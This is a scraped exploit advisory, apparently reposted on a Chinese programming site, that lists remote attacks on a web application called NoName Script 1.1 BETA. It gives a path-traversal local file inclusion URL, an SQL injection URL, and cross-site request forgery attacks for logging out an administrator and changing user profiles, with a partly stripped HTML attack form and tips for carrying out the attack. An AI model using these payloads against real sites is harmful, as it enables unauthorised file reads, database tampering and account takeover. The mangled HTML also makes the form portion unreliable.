欢迎来到福编程网,本站提供各种互联网专业知识!

NoName Script

发布时间:1970-01-01 作者:佚名 来源:互联网
################################################################################[]NoNameScript1.1BETAMultipleRemoteVulnerabilities[]DiscoveredBySirGod[]www.mortal-team.org
################################################################################

[ ] NoName Script 1.1 BETA Multiple Remote Vulnerabilities

[ ] Discovered By SirGod

[ ] www.mortal-team.org

[ ] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,MesSiAH,xZu,HrN,kemrayz

################################################################################# [ ] Local File Inclusion http://localhost/index.php?action=../../../autoexec.bat&kategorie=Tutorial

This will open autoexec.bat . [ ] SQL Injection http://localhost/index.php?action=newsadmindel&file_id=[SQL]

[ ] Cross Site Request Forgery If an logged in user with administrative permisions will click the following link ,he will be logged out. http://localhost/logout.php [ ] Cross Site Request Forgery - Change User Profile If an logged in user with administrative permisions will click the following link the following action will be executed. What to change :

- form action and profil_id :

action : change http://localhost with the website link.

profil_id : id of the user that you want to change settings for it

- input value :

value : your name (corresponding to ID)

And now edit the other settings change via web browser.After that,use this CSRF wisely. [ ] Here is the HTML code :

Benutzerinformationen

Benutzername:
Benutzergruppe:

<select name="edit_benutzergruppe" size="1">


Zusätzliche Informationen

Geschlecht: <select name="edit_geschlecht" size="1">

Geburtstag:

<select name="edit_gb_tag" size="1">

<select name="edit_gb_monat" size="1">

Benutzertext:

Homepage:

Instant Messaging

ICQ-Nummer:
MSN-Name:
AIM-Name:

Verwarnungen

Admin wurde noch nicht verwarnt.
Aktion:

Verwarnungen verwalten

#################################################################################

相关推荐